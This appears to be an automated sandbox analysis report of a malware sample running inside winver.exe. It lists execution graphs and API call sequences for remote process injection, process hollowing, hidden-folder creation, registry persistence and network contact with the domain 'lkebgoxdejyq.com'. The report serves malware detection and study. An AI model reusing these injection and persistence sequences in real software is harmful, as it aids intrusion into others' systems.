              • Opcode Fuzzy Hash: 2260b28b3e21410e304e733389a9bb5d28d906a68a869efffc2975d072b34b11
              • Instruction Fuzzy Hash: 1CF08C70C482509BEF907BB08C8A74836AA9F00305F00008ABB4ABE7D6CF7049D09E7B

              Execution Graph

              Execution Coverage:16.6%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:6.8%
              Total number of Nodes:455
              Total number of Limit Nodes:15
              execution_graph 2602 d43f94 2603 d4375b 2602->2603 2604 d43f99 LoadLibraryA 2603->2604 2605 d43fa3 2604->2605 2606 d43fbf 2604->2606 2607 d40cdd GetProcAddress 2605->2607 2623 d43fde 2606->2623 2609 d43fb5 2607->2609 2612 d4421d 2609->2612 2611 d43fba 2636 d43abb VirtualAlloc 2612->2636 2614 d44222 2638 d4390f VirtualAlloc 2614->2638 2616 d44227 2617 d41386 3 API calls 2616->2617 2618 d44240 2617->2618 2619 d41386 3 API calls 2618->2619 2620 d44259 2619->2620 2621 d41386 3 API calls 2620->2621 2622 d44272 2621->2622 2622->2611 2624 d43fe3 2623->2624 2625 d4400c 2624->2625 2626 d43ffc GetModuleHandleA 2624->2626 2644 d4404d 2625->2644 2640 d4411e 2626->2640 2630 d4400a 2630->2611 2631 d4404d 14 API calls 2632 d4402b Sleep 2631->2632 2633 d4404d 14 API calls 2632->2633 2634 d4403b Sleep 2633->2634 2634->2630 2635 d4404d 14 API calls 2634->2635 2635->2630 2636->2636 2637 d43ad3 RtlInitializeCriticalSection 2636->2637 2637->2614 2638->2638 2639 d43927 CreateThread 2638->2639 2639->2616 2642 d44131 2640->2642 2641 d44199 2641->2630 2642->2641 2643 d4421d 7 API calls 2642->2643 2643->2641 2645 d44063 GetPEB 2644->2645 2646 d4401b Sleep 2644->2646 2647 d44072 2645->2647 2646->2631 2647->2646 2649 d440d2 GetProcAddress 2647->2649 2653 d440cd 2647->2653 2649->2647 2650 d440dd Sleep 2649->2650 2661 d440fe 2650->2661 2657 d44072 2653->2657 2654 d440d2 GetProcAddress 2655 d440dd Sleep 2654->2655 2654->2657 2658 d440fe 9 API calls 2655->2658 2656 d4411c 2656->2647 2657->2653 2657->2654 2657->2656 2660 d440cd 9 API calls 2657->2660 2659 d440f8 2658->2659 2660->2657 2662 d4375b 2661->2662 2663 d44103 GetModuleHandleA 2662->2663 2664 d440dd Sleep 2663->2664 2665 d4410d 2663->2665 2667 d440fe 7 API calls 2664->2667 2666 d4411e 7 API calls 2665->2666 2668 d44117 2666->2668 2669 d440f8 2667->2669 2672 d4419d 2668->2672 2674 d441b0 2672->2674 2673 d440f8 2674->2673 2675 d4421d 7 API calls 2674->2675 2675->2673 2537 d43e57 2538 d4375b 2537->2538 2539 d43e5c LoadLibraryA 2538->2539 2540 d40cdd GetProcAddress 2539->2540 2541 d43e72 2540->2541 2542 d41386 3 API calls 2541->2542 2543 d43e8b 2542->2543 2544 d41386 3 API calls 2543->2544 2545 d43ea4 2544->2545 2546 d41386 3 API calls 2545->2546 2547 d43ebd 2546->2547 2548 d41386 3 API calls 2547->2548 2549 d43ed6 2548->2549 2550 d41386 3 API calls 2549->2550 2551 d43eef 2550->2551 2552 d41386 3 API calls 2551->2552 2553 d43f08 2552->2553 2554 d41386 3 API calls 2553->2554 2555 d43f21 2554->2555 2556 d43950 2558 d4395e 2556->2558 2559 d4396f 2558->2559 2562 d4398b 2559->2562 2563 d43990 2562->2563 2566 d439d6 2563->2566 2565 d4399c 2567 d42632 7 API calls 2566->2567 2568 d439f0 lstrcat 2567->2568 2569 d426cd 4 API calls 2568->2569 2570 d43a1b 2569->2570 2570->2565 2386 d42a1f 2387 d4375b 2386->2387 2388 d42a24 lstrcat 2387->2388 2389 d42a2b VirtualAlloc 2388->2389 2389->2389 2390 d42a43 2389->2390 2391 d42a45 WSAStartup 2390->2391 2391->2391 2392 d42a5e Sleep 2391->2392 2406 d42a88 2392->2406 2394 d42a79 2395 d42a8d gethostbyname 2394->2395 2395->2392 2398 d42a97 2395->2398 2396 d42bbb 36 API calls 2396->2398 2397 d435ff 15 API calls 2397->2398 2398->2396 2398->2397 2399 d426cd CreateFileA GetFileSize ReadFile CloseHandle 2398->2399 2400 d42af8 DeleteFileA 2398->2400 2401 d42740 CreateFileA SetFilePointer WriteFile CloseHandle 2398->2401 2402 d42b3c DeleteFileA 2398->2402 2403 d42b81 2398->2403 2404 d42ba2 Sleep 2398->2404 2399->2398 2400->2398 2401->2398 2402->2398 2403->2404 2405 d42b8c DeleteFileA 2403->2405 2404->2398 2405->2404 2407 d42a79 2406->2407 2407->2406 2408 d42a8d gethostbyname 2407->2408 2409 d42a5e Sleep 2408->2409 2416 d42a97 2408->2416 2410 d42a88 55 API calls 2409->2410 2410->2407 2413 d426cd CreateFileA GetFileSize ReadFile CloseHandle 2413->2416 2414 d42af8 DeleteFileA 2414->2416 2415 d42740 CreateFileA SetFilePointer WriteFile CloseHandle 2415->2416 2416->2413 2416->2414 2416->2415 2417 d42b3c DeleteFileA 2416->2417 2418 d42b81 2416->2418 2419 d42ba2 Sleep 2416->2419 2421 d42bbb 2416->2421 2435 d435ff 2416->2435 2417->2416 2418->2419 2420 d42b8c DeleteFileA 2418->2420 2419->2416 2420->2419 2428 d42bcc 2421->2428 2422 d42bed inet_addr 2423 d42c0f gethostbyname 2422->2423 2422->2428 2424 d42c27 Sleep gethostbyname 2423->2424 2423->2428 2424->2428 2425 d42c82 gethostbyname 2427 d42ca3 gethostbyname 2425->2427 2425->2428 2426 d42d3d Sleep 2426->2426 2426->2428 2427->2428 2429 d42cbe gethostbyname 2427->2429 2428->2422 2428->2425 2428->2426 2432 d42d86 2428->2432 2429->2428 2430 d42cd9 gethostbyname 2429->2430 2430->2428 2432->2428 2434 d42df3 2432->2434 2440 d42d95 2432->2440 2453 d42df8 CryptStringToBinaryA 2432->2453 2434->2416 2477 d4362a 2435->2477 2438 d43634 2438->2416 2451 d42bcc 2440->2451 2441 d42bed inet_addr 2442 d42c0f gethostbyname 2441->2442 2441->2451 2443 d42c27 Sleep gethostbyname 2442->2443 2442->2451 2443->2451 2444 d42df8 18 API calls 2444->2451 2445 d42df3 2445->2432 2446 d42c82 gethostbyname 2448 d42ca3 gethostbyname 2446->2448 2446->2451 2447 d42d3d Sleep 2447->2447 2447->2451 2449 d42cbe gethostbyname 2448->2449 2448->2451 2450 d42cd9 gethostbyname 2449->2450 2449->2451 2450->2451 2451->2440 2451->2441 2451->2444 2451->2445 2451->2446 2451->2447 2452 d42d95 18 API calls 2451->2452 2452->2451 2454 d42e45 CryptDecodeObjectEx 2453->2454 2455 d42f8d 2453->2455 2454->2455 2456 d42e82 2454->2456 2455->2432 2466 d42ecb 2456->2466 2459 d42eea CryptImportPublicKeyInfo 2460 d42f0c CryptCreateHash 2459->2460 2461 d42f7f CryptReleaseContext 2459->2461 2462 d42f73 CryptDestroyKey 2460->2462 2463 d42f2f CryptHashData 2460->2463 2461->2455 2462->2461 2464 d42f67 CryptDestroyHash 2463->2464 2465 d42f49 CryptVerifySignatureA 2463->2465 2464->2462 2465->2464 2467 d4375b 2466->2467 2468 d42ed0 CryptAcquireContextA 2467->2468 2469 d42e9c CryptAcquireContextA 2468->2469 2470 d42eea CryptImportPublicKeyInfo 2468->2470 2469->2455 2469->2459 2471 d42f0c CryptCreateHash 2470->2471 2472 d42f7f CryptReleaseContext 2470->2472 2473 d42f73 CryptDestroyKey 2471->2473 2474 d42f2f CryptHashData 2471->2474 2472->2469 2473->2472 2475 d42f67 CryptDestroyHash 2474->2475 2476 d42f49 CryptVerifySignatureA 2474->2476 2475->2473 2476->2475 2478 d4362f 2477->2478 2479 d427b3 15 API calls 2478->2479 2480 d43622 2479->2480 2480->2438 2481 d427b3 2480->2481 2482 d427c4 VirtualAlloc 2481->2482 2482->2482 2483 d427d8 2482->2483 2484 d42632 7 API calls 2483->2484 2485 d42805 2484->2485 2492 d42821 2485->2492 2487 d42818 2488 d4282d 2487->2488 2489 d42740 4 API calls 2487->2489 2490 d42740 4 API calls 2488->2490 2491 d42846 VirtualFree 2488->2491 2489->2488 2490->2488 2491->2438 2493 d4375b 2492->2493 2494 d42826 lstrcat 2493->2494 2495 d4282d 2494->2495 2496 d42740 4 API calls 2495->2496 2497 d42846 VirtualFree 2495->2497 2496->2495 2497->2487 2592 d449ff 2593 d44a1a 2592->2593 2594 d44972 15 API calls 2593->2594 2595 d44a28 2594->2595 2522 d4303b 2523 d43040 2522->2523 2524 d43046 lstrlen 2523->2524 2525 d4305d 2524->2525 2528 d43084 2525->2528 2527 d43072 2529 d43089 2528->2529 2530 d430dd send 2529->2530 2531 d4313e closesocket 2530->2531 2532 d430fa 2530->2532 2531->2527 2533 d430fd send 2532->2533 2534 d4311a 2532->2534 2533->2531 2533->2532 2535 d43122 recv 2534->2535 2536 d4313c 2534->2536 2535->2531 2535->2534 2536->2531 2676 d44c84 2678 d44c97 2676->2678 2677 d44ccd 2678->2677 2680 d44dd3 2678->2680 2682 d44e05 2680->2682 2681 d44e56 2681->2677 2682->2681 2683 d42740 4 API calls 2682->2683 2683->2681 2225 d417e5 2228 d41708 2225->2228 2229 d41725 RtlCreateUserThread 2228->2229 2230 d40ba6 2243 d4375b 2230->2243 2232 d40bab FindWindowA 2233 d40bb5 GetWindowThreadProcessId OpenProcess 2232->2233 2234 d40bed 2232->2234 2233->2234 2235 d40bcf 2233->2235 2252 d408e2 2234->2252 2245 d40e21 VirtualAllocEx 2235->2245 2241 d40be5 ExitProcess 2244 d4376d 2243->2244 2244->2232 2244->2244 2246 d40bda 2245->2246 2247 d40e51 WriteProcessMemory 2245->2247 2246->2234 2246->2241 2247->2246 2248 d40e6f 2247->2248 2249 d40e76 IsWow64Process 2248->2249 2250 d40ea1 CreateRemoteThread 2248->2250 2249->2250 2251 d40e86 2249->2251 2250->2246 2251->2246 2253 d408e8 2252->2253 2255 d40908 2253->2255 2263 d40d05 2255->2263 2257 d40914 2258 d40919 CreateThread CreateThread 2257->2258 2268 d40d29 2258->2268 2282 d42906 2258->2282 2284 d40643 2258->2284 2277 d40c80 GetPEB 2263->2277 2265 d40d0a 2279 d40cdd 2265->2279 2269 d40d44 CreateToolhelp32Snapshot 2268->2269 2269->2269 2270 d40d53 Sleep Process32First 2269->2270 2271 d40df6 FindCloseChangeNotification Sleep 2270->2271 2274 d40d88 2270->2274 2271->2269 2272 d40da6 OpenProcess 2273 d40dcf Process32Next 2272->2273 2272->2274 2273->2271 2273->2274 2274->2272 2274->2273 2275 d40e21 4 API calls 2274->2275 2276 d40dc9 FindCloseChangeNotification 2275->2276 2276->2273 2278 d40c8c 2277->2278 2278->2265 2278->2278 2280 d40ce3 GetProcAddress 2279->2280 2280->2280 2281 d40d01 2280->2281 2281->2257 2283 d42914 2282->2283 2286 d40651 CreateMutexA 2284->2286 2289 d40688 2286->2289 2290 d4375b 2289->2290 2291 d4068d LoadLibraryA 2290->2291 2292 d40cdd GetProcAddress 2291->2292 2293 d406a3 2292->2293 2313 d425e1 2293->2313 2297 d406c5 lstrcat lstrcmpiA 2298 d40705 Sleep 2297->2298 2299 d40818 Sleep 2297->2299 2300 d4254b ExpandEnvironmentStringsA lstrcat lstrcat 2298->2300 2299->2299 2301 d4071f CreateDirectoryA SetFileAttributesA 2300->2301 2302 d42632 7 API calls 2301->2302 2303 d40752 CreateDirectoryA SetFileAttributesA 2302->2303 2304 d425e1 ExpandEnvironmentStringsA lstrcat 2303->2304 2305 d40785 CreateDirectoryA SetFileAttributesA 2304->2305 2306 d407a9 VirtualAlloc 2305->2306 2306->2306 2307 d407c1 2306->2307 2308 d426cd CreateFileA GetFileSize ReadFile CloseHandle 2307->2308 2310 d407de 2307->2310 2308->2307 2309 d42740 CreateFileA SetFilePointer WriteFile CloseHandle 2309->2310 2310->2309 2311 d407fd VirtualFree 2310->2311 2312 d40840 RegCreateKeyExA lstrlen RegSetValueExA RegCloseKey 2311->2312 2312->2299 2334 d42610 2313->2334 2315 d406b2 2316 d406ce 2315->2316 2317 d4375b 2316->2317 2318 d406d3 lstrcat lstrcmpiA 2317->2318 2319 d40705 Sleep 2318->2319 2320 d40818 Sleep 2318->2320 2337 d4254b 2319->2337 2320->2320 2325 d425e1 2 API calls 2326 d40785 CreateDirectoryA SetFileAttributesA 2325->2326 2327 d407a9 VirtualAlloc 2326->2327 2327->2327 2328 d407c1 2327->2328 2330 d407de 2328->2330 2343 d426cd CreateFileA 2328->2343 2332 d407fd VirtualFree 2330->2332 2350 d42740 CreateFileA 2330->2350 2356 d40840 2332->2356 2335 d4375b 2334->2335 2336 d42615 ExpandEnvironmentStringsA lstrcat 2335->2336 2336->2315 2359 d4257f 2337->2359 2339 d4071f CreateDirectoryA SetFileAttributesA 2340 d42632 2339->2340 2367 d42666 2340->2367 2344 d426f2 GetFileSize 2343->2344 2345 d4273c 2343->2345 2346 d42730 CloseHandle 2344->2346 2347 d4270b 2344->2347 2345->2328 2346->2345 2347->2346 2348 d42712 ReadFile 2347->2348 2348->2346 2349 d4272c 2348->2349 2349->2346 2351 d42766 SetFilePointer 2350->2351 2352 d427af 2350->2352 2353 d427a3 CloseHandle 2351->2353 2354 d42783 WriteFile 2351->2354 2352->2330 2353->2352 2354->2353 2355 d4279f 2354->2355 2355->2353 2383 d4089d 2356->2383 2358 d4086f 2360 d4375b 2359->2360 2361 d42584 ExpandEnvironmentStringsA 2360->2361 2364 d425bc 2361->2364 2363 d4259d 2365 d4375b 2364->2365 2366 d425c1 lstrcat lstrcat 2365->2366 2366->2363 2368 d4375b 2367->2368 2369 d4266b ExpandEnvironmentStringsA 2368->2369 2370 d42676 2369->2370 2373 d42680 2369->2373 2371 d425e1 2 API calls 2370->2371 2374 d40752 CreateDirectoryA SetFileAttributesA 2371->2374 2372 d426b6 lstrcat 2372->2374 2373->2372 2378 d426a8 2373->2378 2374->2325 2379 d4375b 2378->2379 2380 d426ad lstrcat 2379->2380 2381 d426b6 lstrcat 2380->2381 2382 d426a3 lstrcat 2381->2382 2382->2372 2384 d4375b 2383->2384 2385 d408a2 RegCreateKeyExA lstrlen RegSetValueExA RegCloseKey 2384->2385 2385->2358 2571 d416c0 2572 d416f7 2571->2572 2573 d416d2 2571->2573 2574 d40e21 4 API calls 2573->2574 2574->2572 2596 d44ae0 2597 d44af3 2596->2597 2598 d44b31 CreateEventA 2597->2598 2599 d44be6 2597->2599 2600 d44b54 2598->2600 2600->2599 2601 d44ed6 WaitForSingleObject 2600->2601 2601->2600 2684 d4328f 2685 d43294 2684->2685 2686 d425e1 2 API calls 2685->2686 2687 d432e5 lstrcat 2686->2687 2688 d432f2 2687->2688 2689 d42740 4 API calls 2688->2689 2690 d43320 2689->2690 2691 d43326 GetStartupInfoA CreateProcessA CloseHandle CloseHandle 2690->2691 2692 d4337e 2690->2692 2691->2692 2498 d41528 2499 d4375b 2498->2499 2500 d4152d LoadLibraryA 2499->2500 2501 d40cdd GetProcAddress 2500->2501 2502 d41543 2501->2502 2515 d41386 2502->2515 2505 d41386 3 API calls 2506 d41575 2505->2506 2507 d41386 3 API calls 2506->2507 2508 d4158e 2507->2508 2509 d41386 3 API calls 2508->2509 2510 d415a7 2509->2510 2511 d41386 3 API calls 2510->2511 2512 d415c0 2511->2512 2513 d41386 3 API calls 2512->2513 2514 d415d9 2513->2514 2516 d41435 2515->2516 2517 d41399 2515->2517 2516->2505 2517->2516 2518 d413a5 VirtualProtect 2517->2518 2518->2516 2519 d413bd VirtualAlloc 2518->2519 2519->2519 2520 d413d2 2519->2520 2521 d41401 VirtualProtect 2520->2521 2521->2516 2693 d44ea8 2694 d44eb5 2693->2694 2695 d44ed1 2693->2695 2694->2695 2696 d44ec7 SetEvent 2694->2696 2696->2695 2697 d409a8 OpenMutexA 2698 d409d0 GetStartupInfoA 2697->2698 2699 d40a13 2697->2699 2701 d40a1a 2698->2701 2702 d4375b 2701->2702 2703 d40a1f CreateProcessA 2702->2703 2704 d40b2d 2703->2704 2705 d40a2f GetThreadContext 2703->2705 2714 d40b34 2704->2714 2705->2704 2706 d40a57 VirtualProtectEx 2705->2706 2706->2704 2709 d40a82 DuplicateHandle 2706->2709 2708 d40b32 2708->2699 2709->2704 2710 d40ac3 WriteProcessMemory 2709->2710 2710->2704 2711 d40af1 ResumeThread 2710->2711 2712 d40b02 Sleep OpenMutexA 2711->2712 2712->2708 2713 d40b28 2712->2713 2713->2704 2713->2712 2716 d40b42 2714->2716 2717 d40d05 2 API calls 2716->2717 2718 d40b4e 2717->2718 2736 d40b68 2718->2736 2720 d40b61 2721 d40b6d LoadLibraryA 2720->2721 2722 d40cdd GetProcAddress 2721->2722 2723 d40b83 2722->2723 2753 d40ba6 2723->2753 2725 d40b98 FindWindowA 2726 d40bb5 GetWindowThreadProcessId OpenProcess 2725->2726 2727 d40bed 2725->2727 2726->2727 2728 d40bcf 2726->2728 2729 d408e2 85 API calls 2727->2729 2730 d40e21 4 API calls 2728->2730 2731 d40bf2 2729->2731 2732 d40bda 2730->2732 2733 d40c80 GetPEB 2731->2733 2732->2727 2734 d40be5 ExitProcess 2732->2734 2735 d40bf7 2733->2735 2737 d4375b 2736->2737 2738 d40b6d LoadLibraryA 2737->2738 2739 d40cdd GetProcAddress 2738->2739 2740 d40b83 2739->2740 2741 d40ba6 85 API calls 2740->2741 2742 d40b98 FindWindowA 2741->2742 2743 d40bb5 GetWindowThreadProcessId OpenProcess 2742->2743 2744 d40bed 2742->2744 2743->2744 2745 d40bcf 2743->2745 2746 d408e2 85 API calls 2744->2746 2747 d40e21 4 API calls 2745->2747 2748 d40bf2 2746->2748 2749 d40bda 2747->2749 2750 d40c80 GetPEB 2748->2750 2749->2744 2751 d40be5 ExitProcess 2749->2751 2752 d40bf7 2750->2752 2752->2720 2754 d4375b 2753->2754 2755 d40bab FindWindowA 2754->2755 2756 d40bb5 GetWindowThreadProcessId OpenProcess 2755->2756 2757 d40bed 2755->2757 2756->2757 2758 d40bcf 2756->2758 2759 d408e2 86 API calls 2757->2759 2760 d40e21 4 API calls 2758->2760 2761 d40bf2 2759->2761 2762 d40bda 2760->2762 2763 d40c80 GetPEB 2761->2763 2762->2757 2764 d40be5 ExitProcess 2762->2764 2765 d40bf7 2763->2765 2765->2725 2584 d44a49 2585 d44a64 2584->2585 2588 d44972 2585->2588 2587 d44a72 2589 d4498a 2588->2589 2590 d449a6 2589->2590 2591 d427b3 15 API calls 2589->2591 2590->2587 2591->2590

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 284 d43084-d430f8 call d4375b call d4377b call d43660 call d43743 send 293 d4313e-d43150 closesocket 284->293 294 d430fa 284->294 295 d430fd-d43111 send 294->295 295->293 296 d43113-d43118 295->296 296->295 297 d4311a-d4311f 296->297 298 d43122-d43134 recv 297->298 298->293 299 d43136-d4313a 298->299 299->298 300 d4313c 299->300 300->293
              APIs
              • send.WS2_32(?,00000000,00000000,00000000), ref: 00D430F0
              • send.WS2_32(?,00000000,-00000004,00000000), ref: 00D43109
              • recv.WS2_32(?,00000000,00A00000,00000000), ref: 00D4312C
              • closesocket.WS2_32(?), ref: 00D43146
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: send$closesocketrecv
              • String ID:
              • API String ID: 3431254638-0
              • Opcode ID: 1986189e0edc64f25eeaa4ec4a6a448cde9b9c69e6188be43a80628219dae969
              • Instruction ID: fab05df0114f22f384e3aed83d4f84adcdb520d1973574f6a367add3bdd5cbdd
              • Opcode Fuzzy Hash: 1986189e0edc64f25eeaa4ec4a6a448cde9b9c69e6188be43a80628219dae969
              • Instruction Fuzzy Hash: C9216FB2B00624ABEF215E2CCC85F9A77A9EF44750F080194FE09EB255D735EE108B70

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 330 d40e21-d40e4f VirtualAllocEx 331 d40eb7-d40eba 330->331 332 d40e51-d40e6d WriteProcessMemory 330->332 332->331 333 d40e6f-d40e74 332->333 334 d40e76-d40e84 IsWow64Process 333->334 335 d40ea1-d40eb1 CreateRemoteThread 333->335 334->335 336 d40e86-d40e9f call d41b15 334->336 335->331 336->331
              APIs
              • VirtualAllocEx.KERNELBASE(0000094C,00000000,00D459C8,00003000,00000040,?,?,?,00D40DC9,00000000,0000094C,00000000), ref: 00D40E47
              • WriteProcessMemory.KERNELBASE(0000094C,00D40000,00000000,00D459C8,00000000,?,00D40DC9,00000000,0000094C,00000000), ref: 00D40E65
              • IsWow64Process.KERNEL32(0000094C,?,?,?,00D40DC9,00000000,0000094C,00000000), ref: 00D40E7B
              • CreateRemoteThread.KERNELBASE(0000094C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D40EB1
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: Process$AllocCreateMemoryRemoteThreadVirtualWow64Write
              • String ID:
              • API String ID: 3578747408-0
              • Opcode ID: 079751ffdfe3eadcbe87efa349abbd0bf3a7fcc1013202ef83eaf6d3d040f129
              • Instruction ID: 37f297c871ea0ac7c90c1dcf6e8650f3e00624181e49fadc81aa7b85a54a19f9
              • Opcode Fuzzy Hash: 079751ffdfe3eadcbe87efa349abbd0bf3a7fcc1013202ef83eaf6d3d040f129
              • Instruction Fuzzy Hash: A3113D32100205BBFF109F15CC45F9A3B69EF80754F184461FE44BE595D771A561CAA8

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNELBASE(00D4067F,00000009,?,00000000), ref: 00D4068D
                • Part of subcall function 00D40CDD: GetProcAddress.KERNEL32(00000000,00D42852), ref: 00D40CEA
                • Part of subcall function 00D406CE: lstrcat.KERNEL32(00000000,00D406C5), ref: 00D406DD
                • Part of subcall function 00D406CE: lstrcmpiA.KERNEL32(?,00000000), ref: 00D406F7
                • Part of subcall function 00D406CE: Sleep.KERNELBASE(00001388), ref: 00D4070A
                • Part of subcall function 00D406CE: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D4072B
                • Part of subcall function 00D406CE: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D4073D
                • Part of subcall function 00D406CE: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D4075E
                • Part of subcall function 00D406CE: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D40770
                • Part of subcall function 00D406CE: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D40791
                • Part of subcall function 00D406CE: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D407A3
                • Part of subcall function 00D406CE: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 00D407B7
                • Part of subcall function 00D406CE: VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 00D407FE
                • Part of subcall function 00D406CE: Sleep.KERNELBASE(00001388), ref: 00D4081D
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: AttributesCreateDirectoryFile$SleepVirtual$AddressAllocFreeLibraryLoadProclstrcatlstrcmpi
              • String ID:
              • API String ID: 3164464694-0
              • Opcode ID: dedc2d939db3d7c890df7c1040c66051942fd048389d53c1cef127f0e56e27d0
              • Instruction ID: 23f8c9bf8dfc605768cabdf3bdcbabf7114ac8dcaafdff28ee4e6e2c134a6c02
              • Opcode Fuzzy Hash: dedc2d939db3d7c890df7c1040c66051942fd048389d53c1cef127f0e56e27d0
              • Instruction Fuzzy Hash: 8E41F0B25042149FDB136B608C89FAA77BCEF44700F450599BB85EF056DE309690CEB5

              Control-flow Graph

              APIs
              • lstrcat.KERNEL32(00000000,00D406C5), ref: 00D406DD
              • lstrcmpiA.KERNEL32(?,00000000), ref: 00D406F7
              • Sleep.KERNELBASE(00001388), ref: 00D4070A
              • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D4072B
              • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D4073D
              • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D4075E
              • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D40770
              • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 00D40791
              • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 00D407A3
              • VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 00D407B7
              • VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 00D407FE
              • Sleep.KERNELBASE(00001388), ref: 00D4081D
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: AttributesCreateDirectoryFile$SleepVirtual$AllocFreelstrcatlstrcmpi
              • String ID:
              • API String ID: 2622802024-0
              • Opcode ID: 951468e210fe95408406a3f4a96b27f98f074e2fde19a294c948bda7aa55e254
              • Instruction ID: ad4a9426797cfd25ec6322903c334694b2ca701d1596d3b84cbc9ac9d193a6b8
              • Opcode Fuzzy Hash: 951468e210fe95408406a3f4a96b27f98f074e2fde19a294c948bda7aa55e254
              • Instruction Fuzzy Hash: CD3100B25002149FDF166BA08C89FAA77BCEF44B00F450499BB85FE055DE309680CEB5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 56 d42bbb-d42bc5 57 d42bcc-d42bd0 56->57 58 d42bd2-d42c09 call d4377b inet_addr 57->58 59 d42c4a-d42c5a 57->59 64 d42cff-d42d38 call d4377b 58->64 65 d42c0f-d42c21 gethostbyname 58->65 60 d42c5c-d42c5f 59->60 60->60 62 d42c61-d42c67 60->62 66 d42c6c-d42c75 62->66 75 d42d3d-d42d4b Sleep 64->75 67 d42c27-d42c44 Sleep gethostbyname 65->67 68 d42cf8-d42cfd 65->68 69 d42c77-d42c79 66->69 70 d42c7b-d42c7d 66->70 67->59 67->68 68->64 69->70 72 d42c7f-d42c80 69->72 70->66 72->66 74 d42c82-d42ca1 gethostbyname 72->74 74->68 76 d42ca3-d42cbc gethostbyname 74->76 75->75 77 d42d4d-d42d81 call d4377b call d423e3 call d42f93 75->77 76->68 78 d42cbe-d42cd7 gethostbyname 76->78 85 d42d86-d42d9e call d42d95 call d438a7 77->85 78->68 80 d42cd9-d42cf2 gethostbyname 78->80 80->57 80->68 85->57 91 d42da4-d42da9 85->91 91->57 92 d42daf-d42db8 91->92 92->57 93 d42dbe-d42dc1 92->93 93->57 94 d42dc7-d42dcd 93->94 95 d42dcf-d42dd4 94->95 96 d42dda-d42ded call d42df8 94->96 95->57 95->96 96->57 99 d42df3-d42df5 96->99
              APIs
              • inet_addr.WS2_32(008C03E8), ref: 00D42C01
              • gethostbyname.WS2_32(00000000), ref: 00D42C19
              • Sleep.KERNEL32(00002710), ref: 00D42C2C
              • gethostbyname.WS2_32(00000000), ref: 00D42C3C
              • gethostbyname.WS2_32(0000002E), ref: 00D42C99
              • gethostbyname.WS2_32(00000000), ref: 00D42CB4
              • gethostbyname.WS2_32(00000000), ref: 00D42CCF
              • gethostbyname.WS2_32(00000000), ref: 00D42CEA
              • Sleep.KERNELBASE(00000001,?,702F5000,00000020), ref: 00D42D40
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: gethostbyname$Sleep$inet_addr
              • String ID: lkebgoxdejyq.com
              • API String ID: 2568590207-2004641040
              • Opcode ID: a34b4da2268bc860f0f520e321a245857b8b4490be8b3e996429ce054df9c95d
              • Instruction ID: 29182fd8fffc853ec22e872201cef8e2d427b95695ff9f496af6a401a3e68879
              • Opcode Fuzzy Hash: a34b4da2268bc860f0f520e321a245857b8b4490be8b3e996429ce054df9c95d
              • Instruction Fuzzy Hash: 3851F472600604AFEF029F24C8C4BAA7BEDEF40701F894569FD4ADF04ADB749654CAB5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 100 d42666-d42674 call d4375b ExpandEnvironmentStringsA 103 d42676-d4267e call d425e1 100->103 104 d42680-d4268a 100->104 109 d426c9-d426ca 103->109 106 d426b6-d426c3 lstrcat 104->106 107 d4268c-d426b0 call d426a8 lstrcat 104->107 106->109 107->106
              APIs
              • ExpandEnvironmentStringsA.KERNEL32(00D42656,00000010,?,?,00000000,00000104), ref: 00D4266B
              • lstrcat.KERNEL32(00000000,00D426A3), ref: 00D426B0
              • lstrcat.KERNEL32(00000000,00000000), ref: 00D426C3
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.3342743835.0000000000D40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_d40000_winver.jbxd
              Similarity
              • API ID: lstrcat$EnvironmentExpandStrings
              • String ID: \AC\
              • API String ID: 2903145849-1749977576
              • Opcode ID: 57d19e234318a21f2b0c89695377393bf8fdbed8659455edca517ce897c98d3c
